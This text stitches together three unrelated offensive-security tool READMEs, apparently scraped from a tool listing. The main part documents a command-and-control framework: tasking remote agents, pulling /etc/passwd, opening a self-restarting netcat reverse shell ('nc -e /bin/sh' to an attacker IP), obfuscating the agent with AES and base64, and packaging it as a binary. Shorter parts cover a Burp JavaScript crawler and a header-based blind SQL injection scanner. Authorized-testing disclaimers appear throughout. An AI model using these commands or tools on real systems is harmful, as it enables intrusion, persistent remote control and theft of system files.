Below is the flow diagram for this case.
To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.
# show all availiable agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval of the agents that checks for tasks to 30 seconds like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, lets select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session like with netcat or metaspolit do the following.
# show all availiable agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.
The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding
Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened
Create new certs in each engagement
Backup your c2.db, it is easy... just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.
Before installing JSpector, you need to have Jython installed on Burp Suite.
Extensions
tab.Add
button in the Installed
tab.Extension Details
dialog box, select Python
as the Extension Type
.Select file
button and navigate to the JSpector.py
.Next
button.Close
button.Dashboard
tab.HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command
You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file or even some more custom header in that file itself according to your need.